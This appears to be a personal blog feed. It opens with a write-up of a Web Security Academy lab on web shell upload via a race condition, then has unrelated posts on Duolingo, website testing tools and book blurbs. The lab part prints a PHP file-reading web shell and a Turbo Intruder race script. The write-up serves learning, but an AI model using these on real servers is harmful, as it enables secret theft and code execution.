      9LKhNJGiTLcMURUGt9a5WulDgvZwvvGDUlnfmPzaglT7VoZcV0lwo4sXK1emCplNsJsf2LU4Wa1arKxmik9iN0pCb4xBhBJ7Id8Bn2Ay6RhWPd2uHyBhhTnCjU7wgdGJjYNBBptx2ky9k0kWHCqpe09UGryPKiaNFugvgEWHpmAOjXxRY7JpH50hbtmw4uZQ3L0k0W2DpYBvcYvgTsXIW2tGiPdN.php

    

this was the biggest name that windows let me to use. then I made the file upload ready but before that, I started burp turbo intruder with the above code on this request as a NULL payload:

      GET /files/avatars/9LKhNJGiTLcMURUGt9a5WulDgvZwvvGDUlnfmPzaglT7VoZcV0lwo4sXK1emCplNsJsf2LU4Wa1arKxmik9iN0pCb4xBhBJ7Id8Bn2Ay6RhWPd2uHyBhhTnCjU7wgdGJjYNBBptx2ky9k0kWHCqpe09UGryPKiaNFugvgEWHpmAOjXxRY7JpH50hbtmw4uZQ3L0k0W2DpYBvcYvgTsXIW2tGiPdN.php HTTP/1.1
Host: aca11f781e0864bac09904d8002e00ef.web-security-academy.net
Cookie: session=vPq6ob4pyKBosm73un9VIH47fzVFKaqo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

    

then I hit upload on the web page in the browser to send the file, and after about one minute I could get some 200 responses in turbo intruder containing password for carlos! :)

Solution 2: Web Security Academy’s Solution

The Web Security Academy solved this lab in a better and more precise way that can be used in the future race condition situations without bombarding the server with many requests:

As you can see from the hint source code above, the uploaded file is moved to an accessible folder, where it is checked for viruses. Malicious files are only removed once the virus check is complete. This means it’s possible to execute the file in the small time-window before it is removed.

Note 1

Due to the generous time window for this race condition, it is possible to solve this lab by manually sending two requests in quick succession using Burp Repeater. The solution described here teaches you a practical approach for exploiting similar vulnerabilities in the wild, where the window may only be a few milliseconds.

1. Log in and upload an image as your avatar, then go back to your account page.

2. In Burp, go to Proxy > HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>.

3. On your system, create a file called exploit.php containing a script for fetching the contents of Carlos’s secret. For example:

      <?php echo file_get_contents('/home/carlos/secret'); ?>

    

4. Log in and attempt to upload the script as your avatar. Observe that the server appears to successfully prevent you from uploading files that aren’t images, even if you try using some of the techniques you’ve learned in previous labs.

5. If you haven’t already, add the Turbo Intruder extension to Burp from the BApp store.

6. Right-click on the POST /my-account/avatar request that was used to submit the file upload and select Extensions > Turbo Intruder > Send to turbo intruder. The Turbo Intruder window opens.

7. Copy and paste the following script template into Turbo Intruder’s Python editor:

      def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

    

8. In the script, replace <YOUR-POST-REQUEST> with the entire POST /my-account/avatar request containing your exploit.php file. You can copy and paste this from the top of the Turbo Intruder window.

9. Replace <YOUR-GET-REQUEST> with a GET request for fetching your uploaded PHP file. The simplest way to do this is to copy the GET /files/avatars/<YOUR-IMAGE> request from your proxy history, then change the filename in the path to exploit.php.

10. At the bottom of the Turbo Intruder window, click Attack. This script will submit a single POST request to upload your exploit.php file, instantly followed by 5 GET requests to /files/avatars/exploit.php.

11. In the results list, notice that some of the GET requests received a 200 response containing Carlos’s secret. These requests hit the server after the PHP file was uploaded, but before it failed validation and was deleted.

12. Submit the secret to solve the lab.

Note 2

If you choose to build the GET request manually, make sure you terminate it properly with a \r\n\r\n sequence. Also remember that Python will preserve any whitespace within a multiline string, so you need to adjust your indentation accordingly to ensure that a valid request is sent.

My Comment

1. Use Burp Turbo Intruder for race condition tests.

2. There’s always a risk for race condition and then remote code execution if the file upload mechanism uploads files on the server then validates them even if the file stays on the server for only a fraction of a second.

External Links

• Lab: Web shell upload via race condition

References

There are many ways to bypass flawed validation of file uploads to upload web shells on web applications, this link explains some ways like creating a polyglot image file containing malicious code in its metadata using tools like exiftool, this method is interesting, check it out.

Also you can practice this vulnerability in Web Security Academy, check the link below.

External Links

• Hide malicious shell in image file

• Lab: Remote code execution via polyglot web shell upload

References

Learning a new language can be hard and time-consuming but with a proper method, it can be fun and smooth.

Duolingo is a very fun and effective way to learn a new language. It has many great features. One of them is streak, which is built if you complete your lessons every day.

It even sends you a notification if you don’t do your daily learning to remind you that in order to keep your streak, you need to do the daily learning of a few fun minutes.

Also you choose your daily goal from 5 different levels: Basic, Casual, Regular, Serious, Intense, with each higher level you need to put more time energy for learning.

I’m using Duolingo to learn German and it has been a fun and effective experience so far.

External Links

• Duolingo Website

Great article about some relatively new HTTP Security Headers.

External Links

• COEP COOP CORP CORS CORB - CRAP that’s a lot of new stuff!

References

Here is a list of some handy benchmarking tools for your website:

External Links

Performance and Speed Testing

• PageSpeed Insights
• Website Performance and Optimization Test
• GTmetrix
• Website Image Analysis Tool

Structure check

• Nu Html Checker
• W3C Feed Validation Service
• RSS Validator
• Domain Health Report

SEO

• Google SEO Checker 2.0
• Seobility Free SEO Checker
• SEO Site Checkup
• Seoptimer SEO Audit & Reporting Tool
• SEORCH
• Semrush SEO Checker

Security Check

General

• Internet.nl: Is your Internet UP to Date?
• The Mozilla Observatory

TLS Check

• SSL Server Test
• TLS checker

HTTP Security Headers Check

• Security Headers
• CSP Analyser
• CSP Evaluator

Email Security

• DMARC Domain Checker

DNSSEC Evaluation

• DNSViz

Privacy Check

• CookieMetrix

Other useful tools

Create web-optimized image/video formats

• FFMPEG
• ImageMagick
• CWEBP
• Squoosh

RSS Readers

• Feedly online RSS reader
• NewsFlow

References

Amazon Description

INSTANT NEW YORK TIMES and LOS ANGELES TIMES BESTSELLER “Brilliant… riveting, scary, cogent, and cleverly argued.”—Beth Macy, author of Dopesick As heard on Fresh Air

This book is about pleasure. It’s also about pain. Most important, it’s about how to find the delicate balance between the two, and why now more than ever finding balance is essential. We’re living in a time of unprecedented access to high-reward, high-dopamine stimuli: drugs, food, news, gambling, shopping, gaming, texting, sexting, Facebooking, Instagramming, YouTubing, tweeting… The increased numbers, variety, and potency is staggering. The smartphone is the modern-day hypodermic needle, delivering digital dopamine 24/7 for a wired generation. As such we’ve all become vulnerable to compulsive overconsumption.

In Dopamine Nation, Dr. Anna Lembke, psychiatrist and author, explores the exciting new scientific discoveries that explain why the relentless pursuit of pleasure leads to pain…and what to do about it. Condensing complex neuroscience into easy-to-understand metaphors, Lembke illustrates how finding contentment and connectedness means keeping dopamine in check. The lived experiences of her patients are the gripping fabric of her narrative. Their riveting stories of suffering and redemption give us all hope for managing our consumption and transforming our lives. In essence, Dopamine Nation shows that the secret to finding balance is combining the science of desire with the wisdom of recovery.

Editorial Reviews

Review

“Anna Lembke deeply understands an experience I hear about often in the therapy room at the nexus between our modern addictions and our primal brains. Her stories of guiding people to find a healthy balance between pleasure and pain have the power to transform your life.” —Lori Gottlieb, “Dear Therapist” columnist at The Atlantic, New York Times bestselling author of Maybe You Should Talk to Someone

“Just when you thought you knew all you needed to know about the addiction crisis, along comes Dr. Anna Lembke with her second brilliant book on the topic—this one not about a drug but about the most powerful chemical of all: the dopamine that rules the pain and pleasure centers of our minds. In an era of overconsumption and instant gratification, Dopamine Nation explains the personal and societal price of being ruled by the next fix—and how to manage it. No matter what you might find yourself over-indulging in—from the internet to food to work to sex—you’ll find this book riveting, scary, cogent, and cleverly argued. Lembke weaves patient stories with research, in a voice that’s as empathetic as it is clear-eyed.” —Beth Macy, author of Washington Post Best Book of the Year, New York Times Notable Book of 2018 and bestseller Dopesick: Dealers, Doctors, and the Drug Company That Addicted America

“We all desire a break from our routines and those parts of life that upset us. What if, instead of trying to escape these things, we learn to turn toward them, to reach a peaceful harmony with our selves and the people we share our lives with? Lembke has written a book that radically changes the way we think about mental illness, pleasure, pain, reward, and stress. Turn toward it. You’ll be happy you did.” —Daniel Levitin, New York Times bestselling author of The Organized Mind and Successful Aging

“Explore[s] the dichotomy between seeking a readily accessible hit of dopamine—from our phones, gambling, or a bag of Fritos—and maintaining healthy, productive, stable lives.” —The New York Times, Inside the Best-Seller List

“[An] eye-opening survey on pleasure-seeking and addiction… Readers looking for balance will return to Lembke’s informative and fascinating guidance.” —Publishers Weekly starred review

“… fascinating case histories, and a sensible formula for treatment.” —Kirkus Reviews

About the Author

Anna Lembke is the medical director of Stanford Addiction Medicine, program director for the Stanford Addiction Medicine Fellowship, and chief of the Stanford Addiction Medicine Dual Diagnosis Clinic. She is the recipient of numerous awards for outstanding research in mental illness, for excellence in teaching, and for clinical innovation in treatment. A clinician scholar, she has published more than a hundred peer-reviewed papers, book chapters, and commentaries in prestigious outlets such as The New England Journal of Medicine and JAMA. She sits on the board of several state and national addiction-focused organizations, has testified before various committees in the United States House of Representatives and Senate, keeps an active speaking calendar, and maintains a thriving clinical practice.

Book Details

Author: Dr. Anna Lembke

Category: Sociological Study of Medicine, Medical Clinical Psychology, Emotional Mental Health

Publisher: Dutton (August 24, 2021)

Paperback: 304 pages

My Comment

This is an important topic in this day and age, especially for the tech savvy and heavy computer and digital devices users in order to maintain health and well-being. This is a great book. Probably the best book that I’ve seen about Dopamine hormone because it explains this hard Neuroscience topic in an easy to understand manner. In my opinion, this is a very important and informative book which is a necessary read and its message is probably as important as The Selfish Gene for us, so it is highly recommended.

References

A few simple but very important daily hacks for a sharper brain.

External Links

• 11 Neurosciece Hacks to Wire Your Brain for Success

References

Can we, as adults, grow new neurons? Neuroscientist Sandrine Thuret says that we can, and she offers research and practical advice on how we can help our brains better perform neurogenesis, improving mood, increasing memory formation and preventing the decline associated with aging along the way.

External Links

• Your Can Grow New Brain Cells. Here is How

References

Amazon Description

Even today, as trendy diets and a weight-loss frenzy sweep the nation, two-thirds of adults are still obese and children are being diagnosed with Type 2 diabetes, typically an “adult” disease, at an alarming rate. If we’re obsessed with being thin more so than ever before, why are Americans stricken with heart disease as much as we were 30 years ago?

In The China Study, Dr. T. Colin Campbell details the connection between nutrition and heart disease, diabetes, and cancer. The report also examines the source of nutritional confusion produced by powerful lobbies, government entities, and opportunistic scientists. The New York Times has recognized the study as the “Grand Prix of epidemiology” and the “most comprehensive large study ever undertaken of the relationship between diet and the risk of developing disease.”

The China Study is not a diet book. Dr. Campbell cuts through the haze of misinformation and delivers an insightful message to anyone living with cancer, diabetes, heart disease, obesity, and those concerned with the effects of aging.

Editorial Reviews

Review

“[These] findings from the most comprehensive large study ever undertaken of the relationship between diet and the risk of developing disease are challenging much of American dietary dogma.” — The New York Times

“Reflects the profound changes that industrialization is bringing to diet and disease patterns in China, statistics that have had an impact on reevaluating dietary policy in the United States and worldwide.” — Washington Post

“Everyone in the field of nutrition science stands on the shoulders of Dr. Campbell, who is one of the giants in the field. This is one of the most important books about nutrition ever written—reading it may save your life.” —Dean Ornish, MD, Founder & President, Preventative Medicine Research Institute; Clinical Professor of Medicine, University of California, San Francisco; Author, Dr. Dean Ornish’s Program for Reversing Heart Disease and Love & Survival

“Colin Campbell’s The China Study is an important book, and a highly readable one. With his son, Tom, Colin studies the relationship between diet and disease, and his conclusions are startling. The China Study is a story that needs to be heard.” —Robert C. Richardson, PhD, Nobel Prize Winner; Professor of Physics and Vice Provost of Research, Cornell University

“The China Study gives critical, life-saving nutritional information … Dr. Campbell’s exposé of the research and medical establishment makes this book a fascinating read and one that could change the future for all of us.” —Joel Fuhrman, MD, Author, Eat to Live

“The China Study is a life changer . . . After reading it I felt compelled to recommend this book to as many people as possible.” —Bob Napoli, Senior Vice President, Operations, Hudson Group

About the Author

For more than 40 years, T. Colin Campbell, PhD, has been at the forefront of nutrition research. His legacy, the China Study, is the most comprehensive study of health and nutrition ever conducted. Dr. Campbell is the Jacob Gould Schurman Professor Emeritus of Nutritional Biochemistry at Cornell University. He has received more than 70 grant years of peer-reviewed research funding and authored more than 300 research papers. The China Study was the culmination of a 20-year partnership of Cornell University, Oxford University and the Chinese Academy of Preventive Medicine.

A 1999 graduate of Cornell University and recipient of a medical degree in 2010, Thomas M. Campbell II, MD, is a writer, actor and five-time marathon runner.

Book Details

Authors: T. Colin Campbell, Thomas Campbell

Category: Food Science, Nutrition

Publisher: BenBella Books; 1st edition (May 11, 2006)

Paperback: 419 pages

My Comment

This book is about one of the longest and most comprehensive researches ever done in the history of nutrition field. This study took about 27 years and the results were startling. It concluded that animal meat and diary products may boost the growth of cancer cells and a chain of other diseases and also vegetarianism is the real diet for us. This was the summary of this book but it contains many other essential details. Whether you believe the results of this experiment are right or wrong, there is no doubt that fruits and vegetables are absolutely necessary for our diet in order for us to maintain a healthy lifestyle and many explanations in this book make it really clear why this is so. I had read this book many years ago when I’d put a lot of effort into bodybuilding and healthy diets and the explanations in this book was really eye opening for me at that time. As I searched amazon for this book post, I saw that there is now a revised edition of this book that’s been written in recent years, I recommend that you read the new revised and expanded edition.

References

Amazon Description

Bug Bounty Bootcamp teaches you how to hack web applications. You will learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them. You’ll also learn how to navigate bug bounty programs set up by companies to reward security professionals for finding bugs in their web applications.

Bug bounty programs are company-sponsored programs that invite researchers to search for vulnerabilities on their applications and reward them for their findings. This book is designed to help beginners with little to no security experience learn web hacking, find bugs, and stay competitive in this booming and lucrative industry.

You’ll start by learning how to choose a program, write quality bug reports, and maintain professional relationships in the industry. Then you’ll learn how to set up a web hacking lab and use a proxy to capture traffic. In Part 3 of the book, you’ll explore the mechanisms of common web vulnerabilities, like XSS, SQL injection, and template injection, and receive detailed advice on how to find them and bypass common protections. You’ll also learn how to chain multiple bugs to maximize the impact of your vulnerabilities.

Finally, the book touches on advanced techniques rarely covered in introductory hacking books but that are crucial to understand to hack web applications. You’ll learn how to hack mobile apps, review an application’s source code for security issues, find vulnerabilities in APIs, and automate your hacking process. By the end of the book, you’ll have learned the tools and techniques necessary to be a competent web hacker and find bugs on a bug bounty program.

Editorial Reviews

Review

“A really good book for getting started in Bug Bounty, out at a time when something like this was really needed. You can take as many ethical hacking courses as you want, but when it comes to bug bounty, there is so much information and tools it can be imitating to start . . . This really should be the first book read by ANYONE looking to start in the bug bounty game.” —Alex/Muldwych, The Security Noob

“Bug Bounty Bootcamp should be on every hacker’s shelf. Vickie Li answers an important question: ‘So you found your first flaw, what’s next?’ By explaining how to write a bug report and interact with clients, she presents a wonderful guide on starting your security career.” —Andrew Orr, Associate Editor, The Mac Observer

“I have enjoyed Bug Bounty Bootcamp over the past few weeks and this is great for bug bounty beginners like myself. Anyone who is interested in learning more about different web vulnerabilities, bug bounty platforms, how the internet works, and how to make money making the web safer this is the book for you. Thanks to Vickie for writing such a great book!” —The Digital Empress, YouTuber and Blogger

“Bug Bounty Bootcamp by Vickie Li is a thorough and masterful explanation for how to find bugs and responsibly report them. It is written so clearly, and provides such useful step-by-step instructions that as I was reading it, I was tempted to start hunting for bugs myself.” —Cynthia Brumfield, President, DCT-Associates

“Bug Bounty Bootcamp is a great resource for those who want to participate in Bug Bounties because it not only teaches you about the technical aspects, but helps you develop a methodology and sustain your testing. Some technology knowledge is assumed, but it does a solid job of describing the relevant vulnerability types from first principles, so it can be a strong resource for those new to the security space. The writing style is clear and to the point.” —David Tomaschik, Security Engineer at Google, Blogger at System Overlord

“I highly suggest reading Bug Bounty Bootcamp.” —@HolyBugx

“Pure GEM. Learned a lot of things from her book.” —Aakash Choudhary, @LearnerHunter

“Loved the book. Well written, clear, concise, and easy to follow. Everyone from the beginner bug hunter to the seasoned pro will find a nugget, some nuggets or just pure nuggets of amazing information, tips and advice.” —Douglas Campbell, Advanced Reviewer

“The only book you need to get started in bug bounty is @vickieli7’s book coming out from @nostarch, Bug Bounty Bootcamp. It’s a detailed how-to with lots of technical how-to steps.” —Metacurity, Top Infosec News Destination, @Metacurity

“The new go-to resource for a beginner in web app hacking . . . I recommend this book before anything else for a beginner trying to learn web security. Vickie provides an excellent delivery of breaking down complex concepts that makes it easy to comprehend. Also, the step by step guidance of exploiting a vulnerability is fantastic to refer back to . . . If you are a complete beginner and feel confused or lost in all of the information out there then stop, grab this book, read through it once, then use it as your guide.” —AntiRuse, @AntiRuse, Blogger

“Definitely recommend it!” —Michael, @DoAbarrel_Troll

“Bug Bounty Bootcamp is the book for everyone in Information Technology, not just those interested in bug bounties . . . This easy-to-read guide breaks down complicated topics into a simple progression through technical concepts. From a foundational overview of the industry and how to get started, the reader progresses from Cross Site Scripting all the way through to API hacking and use of Fuzzers. Vickie Li has done a tremendous service to information security by sharing her expert understanding of bug hunting in a highly accessible way. Recommended reading for all IT professionals, new or veteran.” —Jess Vachon, Advanced Reviewer

“Vicki Li’s book took me from knowing nothing about bug bounties, to finding my first bug. Li goes over the process of bug bounties, writing reports, and how to make relationships with companies. Li also has expert techniques that will help your automate your hacking experience and even hacking android apps.” —Anthony Ware, Advanced Reviewer

About the Author

Vickie Li is a developer and security researcher experienced in finding and exploiting vulnerabilities in web applications. She has reported vulnerabilities to firms such as Facebook, Yelp and Starbucks and contributes to a number of online training programs and technical blogs.

Book Details

Author: Vickie Li

Category: Computer Programming Debugging, Software Testing, Computer Networking

Publisher: No Starch Press (December 7, 2021)

Paperback: 416 pages

My Comment

If you want to start in the field of Bug Bounty Hunting or even if you are an experienced bug bounty hunter, you’ll benefit tremendously from this book. Vickie Li is a great writer and she explains every concept very carefully. If you are a newcomer, you’ll learn a huge amount from reading this book and this book is highly recommended for bug bounty newcomers who have enough networking and programming and http knowledge to understand the topics that are written in this book.

References

Amazon Description

Penetration testers simulate cyber attacks to find security weaknesses in networks, operating systems, and applications. Information security experts worldwide use penetration techniques to evaluate enterprise defenses.

In Penetration Testing, security expert, researcher, and trainer Georgia Weidman introduces you to the core skills and techniques that every pentester needs. Using a virtual machine–based lab that includes Kali Linux and vulnerable operating systems, you’ll run through a series of practical lessons with tools like Wireshark, Nmap, and Burp Suite. As you follow along with the labs and launch attacks, you’ll experience the key stages of an actual assessment—including information gathering, finding exploitable vulnerabilities, gaining access to systems, post exploitation, and more.

Learn how to: –Crack passwords and wireless network keys with brute-forcing and wordlists –Test web applications for vulnerabilities –Use the Metasploit Framework to launch exploits and write your own Metasploit modules –Automate social-engineering attacks –Bypass antivirus software –Turn access to one machine into total control of the enterprise in the post exploitation phase

You’ll even explore writing your own exploits. Then it’s on to mobile hacking—Weidman’s particular area of research—with her tool, the Smartphone Pentest Framework.

With its collection of hands-on lessons that cover key tools and strategies, Penetration Testing is the introduction that every aspiring hacker needs.

Editorial Reviews

Review

“The explanatory subtitle of this book is ‘A Hands-On Introduction to Hacking,’ and it’s exactly what you’ll get. This is the best book for pentesting beginners that I ever had the pleasure of reading.” —Help Net Security

“An excellent resource into the realm of penetration testing.” —Ethical Hacker

“Practical, useful and insightful. How hackers work and how you can use the same methods and tools to guard your systems against attack.” —Sandra Henry-Stocker, IT World

“Weidman’s presentation has much to recommend it to the technical security professional. Definitely a recommended read.” —Richard Austin, IEEE Cipher

“An excellent resource into the realm of penetration testing.” —Xavier Mertins, TrueSec

“A sound introduction to pentesting.” —ACM Computing Reviews

“A great book on infosec, detailing a large sum of computer penetration testing and exploitation.” —Dan Borges, Lockboxx

“A great introduction to finding vulnerabilities in your system penetration testing made accessible, and well illustrated too.” —MagPi Magazine

“This is one of the top books you must read if you are new to penetration testing . . . Not only is the book still relevant to the community, new courses are being created that center around this book. Including a new one taught by Georgia herself! And although Georgia is currently working on a new version, this book is still a must have in any hacker’s collection.” —Davin Jackson, Alpha Cyber Security, Books to Start Your Penetration Testing Journey

“Arguably, one of the best books I have ever read as a beginner. I learned about different domains of security and penetration testing, and the author never slipped from the point and got distracted. Overall, an excellent informational resource, a great introduction to penetration testing.” —Sudo Realm

“Penetration Testing: A Hands-on Introduction to Hacking, by Ms. Georgia Weidman, is one of the best book for to start with and for advancing the career in the field of penetration testing. I personally suggest the learners to start with this as the use of words are very simple which makes learning easy, also the methods are well explained for novice to grasp.” —Kamal Dev, KamalDev.me

“The Bible for IT-based testing.” —Dave, /@CyberOutsider

About the Author

Georgia Weidman is a penetration tester and researcher, as well as the founder of Bulb Security, a security consulting firm. She presents at conferences around the world, including Black Hat, ShmooCon, and DerbyCon, and teaches classes on topics such as penetration testing, mobile hacking, and exploit development. She was awarded a DARPA Cyber Fast Track grant to continue her work in mobile device security.

Book Details

Author: Georgia Weidman

Category: Penetration Testing, Computer Networking

Publisher: No Starch Press; 1st edition (June 14, 2014)

Paperback: 528 pages

My Comment

This book is one of the greatest books for newcomers to get their hands dirty with hands-on experiment in the field of hacking, the book is quite old but the core concepts are still the same, many complain that they cannot follow with the book exercises but it is wrong, you need to use google and you shouldn’t complain about not finding book resources if you really want to become a professional hacker, all the book sections except the last part which is about mobile hacking can be done and if you google enough, you can find all the necessary files and programs that are referred to in this book. It is highly recommended and necessary to practice the things that are mentioned in the book for yourself. If you check OSCP certification syllabus, you’ll be amazed that most of them are the topics that are covered and practiced in this book! So it is recommended that you read this book and then some other courses for Privilege Escalation and Buffer Overflows before trying OSCP.

References

Amazon Description

This practical, tutorial-style book uses the Kali Linux distribution to teach Linux basics with a focus on how hackers would use them. Topics include Linux command line basics, filesystems, networking, BASH basics, package management, logging, and the Linux kernel and drivers.

If you’re getting started along the exciting path of hacking, cybersecurity, and pentesting, Linux Basics for Hackers is an excellent first step. Using Kali Linux, an advanced penetration testing distribution of Linux, you’ll learn the basics of using the Linux operating system and acquire the tools and techniques you’ll need to take control of a Linux environment.

First, you’ll learn how to install Kali on a virtual machine and get an introduction to basic Linux concepts. Next, you’ll tackle broader Linux topics like manipulating text, controlling file and directory permissions, and managing user environment variables. You’ll then focus in on foundational hacking concepts like security and anonymity and learn scripting skills with bash and Python. Practical tutorials and exercises throughout will reinforce and test your skills as you learn how to:

• Cover your tracks by changing your network information and manipulating the rsyslog logging utility
• Write a tool to scan for network connections, and connect and listen to wireless networks
• Keep your internet activity stealthy using Tor, proxy servers, VPNs, and encrypted email
• Write a bash script to scan open ports for potential targets
• Use and abuse services like MySQL, Apache web server, and OpenSSH
• Build your own hacking tools, such as a remote video spy camera and a password cracker

Hacking is complex, and there is no single way in. Why not start at the beginning with Linux Basics for Hackers?

Editorial Reviews

Review

“The information provided can help even a general user to get more comfortable with the Linux operating system without feeling overwhelmed by more complex, security-related topics and usage. While we could all benefit from more attention to security, Linux Basics for Hackers just might inspire the next crop of budding techies into the security rock stars of tomorrow.” —Tim Everson, The Ethical Hacker Network

“If you’re just getting started or working your way to expert level, getting a copy of this book might be one of the best things you can do to develop your cybersecurity skills.” —Sandra Henry-Stocker, Network World

“Linux Basics for Hackers is immediately practical. Its quick and dirty approach to exploring and using a Linux system was welcome.” —Jesse Smith, DistroWatch Weekly

“If you are starting out in Computer Science and want to get up to speed quickly on Linux and Unix like operating systems, working through this book will put you well ahead of your fellow students, and quickly.” —Greg Laden, Greg Laden’s Blog

“A great guide for those who are not familiar with Linux as well as those who are proficient.” —Davin Jackson, Alpha Cyber Security, Books to Start Your Penetration Testing Journey

“Linux Basics for Hackers is the best book for Jr. penetration testers and newbies who want to learn InfoSec. Though aimed at hacking, it’s the best general intro to Linux I’ve read. Gives a great overview of Linux basics and useful terminal commands.” —@hackerb0t

About the Author

OccupyTheWeb is an InfoSec consultant, forensic investigator, and trainer with more than 20 years in the industry. He maintains the Hackers-Arise training site (https://www.hackers-arise.com/) and trains US military personnel, Department of Defense contractors, and federal employees in information security and hacking.

Book Details

Author: OccupyTheWeb

Category: Linux Networking & System Administration

Publisher: No Starch Press; Illustrated edition (December 4, 2018)

Paperback: 248 pages

My Comment

I think this is one of the best Linux books for newcomers, if you want to start in ethical hacking field, you need to learn Linux and this is one the best books to read first. The book is small, the author OTW is an amazing writer, he explains every topic very smoothly. Learn Bash, Python, Networking basics in Linux, Learn how to use Proxychains… Read every article and book this author writes because his writing style is great and his knowledge in the InfoSec field is unbelievable.

References

Amazon Description

As protecting information continues to be a growing concern for today’s businesses, certifications in IT security have become highly desirable, even as the number of certifications has grown. Now you can set yourself apart with the Certified Ethical Hacker (CEH v11) certification. The CEH v11 Certified Ethical Hacker Study Guide offers a comprehensive overview of the CEH certification requirements using concise and easy-to-follow instructions. Chapters are organized by exam objective, with a handy section that maps each objective to its corresponding chapter, so you can keep track of your progress. The text provides thorough coverage of all topics, along with challenging chapter review questions and Exam Essentials, a key feature that identifies critical study areas. Subjects include common attack practices like reconnaissance and scanning. Also covered are topics like intrusion detection, DoS attacks, buffer overflows, wireless attacks, mobile attacks, Internet of Things (IoT) and more.

This study guide goes beyond test prep, providing practical hands-on exercises to reinforce vital skills and real-world scenarios that put what you’ve learned into the context of actual job roles.

• Gain a unique certification that allows you to function like an attacker, allowing you to identify vulnerabilities so they can be remediated
• Expand your career opportunities with an IT certificate that satisfies the Department of Defense’s 8570 Directive for Information Assurance positions
• Fully updated for the 2020 CEH v11 exam, including the latest developments in IT security
• Access the Sybex online learning center, with chapter review questions, full-length practice exams, hundreds of electronic flashcards, and a glossary of key terms

Thanks to its clear organization, all-inclusive coverage, and practical instruction, the CEH v11 Certified Ethical Hacker Study Guide is an excellent resource for anyone who needs to understand the hacking process or anyone who wants to demonstrate their skills as a Certified Ethical Hacker.

Editorial Reviews

Your complete guide to preparing for the Certified Ethical Hacker version 11 Certification exam

CEH v11 Certified Ethical Hacker Study Guide gives you a hands-on resource for preparing for the challenging body of knowledge covered in the exam. This Sybex Study Guide covers 100% of the 2020 CEH certification requirements presented in an easy-to-follow approach. To keep track of your progress, chapters are organized by exam objective, with a section that maps each objective to its corresponding chapter. The text provides coverage of all topics, with chapter review questions and Exam Essentials, a key feature that identifies critical study areas. Subjects include common attack practices like reconnaissance and scanning. Also covered are topics like intrusion detection, DoS attacks, buffer overflows, wireless attacks, mobile attacks, Internet of Things (IoT), cloud vulnerabilities, and more.

Coverage of 100% of all exam objectives in this Study Guide means you’ll be ready for:

• Footprinting and Reconnaissance
• Scanning Networks
• Enumeration
• System Hacking
• Malware
• Social Engineering
• Wireless Security
• Cryptography
• Interactive learning environment

Take your exam prep to the next level with Sybex’s superior interactive online study tools. To access our learning environment, visit www.wiley.com/go/sybextestprep, register your book to receive your unique PIN, and instantly gain a year of FREE access to:

• Interactive test bank with 2 practice exams. Practice exams help you identify areas where further review is needed. 500 questions total!
• 100 electronic flashcards to reinforce learning and last-minute prep before the exam
• Comprehensive glossary in PDF format gives you instant access to the key terms so you are fully prepared

About the Author

RIC MESSIER, CEH, GCIH, GSEC, CISSP, CCSP is a consultant, educator, and author of many books on information security and digital forensics. With decades of experience in information technology and information security, Ric has held the varied roles of programmer, system administrator, network engineer, security engineering manager, VoIP engineer, consultant, and professor.

Book Details

Author: Ric Messier

Category: Security Certifications

Publisher: Sybex; 1st edition (August 3, 2021)

Paperback: 704 pages

My Comment

I had read the CEH v9 Paperback – January 1, 2017 by Sean-Philip Oriyano some years ago, This book is the new version for CEH exam. It is an easy and fast read and only recommended for newcomers, you won’t get much working experience from this book but you can get yourself familiarized with almost all hacking fields so you can later choose which field you like the most so that you can focus on that one field for much more depth later. So it is a great book for newcomers.

References

Amazon Description

To complement the CompTIA Network+ Study Guide: Exam N10-007, 4e, and the CompTIA Network+ Deluxe Study Guide: Exam N10-007, 4e, look at CompTIA Network+ Practice Tests: Exam N10-007 (9781119432128).

Todd Lammle’s bestselling CompTIA Network+ Study Guide for the N10-007 exam!

CompTIA’s Network+ certification tells the world you have the skills to install, configure, and troubleshoot today’s basic networking hardware peripherals and protocols. First, however, you have to pass the exam! This detailed CompTIA Authorized study guide by networking guru Todd Lammle has everything you need to prepare for the CompTIA Network+ Exam N10-007.

Todd covers all exam objectives, explains key topics, offers plenty of practical examples, and draws upon his own invaluable 30 years of networking experience to help you learn. The Study Guide prepares you for Exam N10-007, the new CompTIA Network+ Exam:

• Covers all exam objectives including network technologies, network installation and configuration, network media and topologies, security, and much more
• Includes practical examples review questions, as well as access to practice exams and flashcards to reinforce learning
• Networking guru and expert author Todd Lammle offers valuable insights and tips drawn from real-world experience Plus, receive one year of FREE access to a robust set of online interactive learning tools, including hundreds of sample practice questions, a pre-assessment test, bonus practice exams, and over 100 electronic flashcards. Prepare for the exam and enhance your career—starting now!

Editorial Reviews

From the Inside Flap

Comprehensive preparation for the CompTIA Network+ exam, with real-world insight and online study tools!

The CompTIA Network+ Study Guide is your one-stop resource for the ultimate in exam preparation. Featuring 100 percent coverage of Exam N10-007 objectives, this book walks you through the essentials of network technologies, installation, configuration, media, topologies, security, and more. Networking guru Todd Lammle draws from 30 years of networking experience to explain key topics, backed by practical examples and real-world insights relevant to what you’ll face on the job. The Sybex online interactive learning environment gives you access to electronic flashcards, sample questions, a pre-assessment test, and bonus practice exams to help you prepare thoroughly and go into the exam with confidence!

Coverage of 100% of all exam objectives in this Study Guide means you’ll be ready for:

• Network Architecture, Applications, and Devices
• Routing Protocols, Cloud Technologies, and Implementations
• Network Monitoring and Performance Tracking
• WAN, LAN, and Switch Configuration
• Vulnerability Identification and Threat Assessment
• Security Controls and Basic Forensics
• Wireless, Cable, Network, Security, and WAN Troubleshooting
• Standards, Safety, Ports, and Protocols
• Interactive learning environment

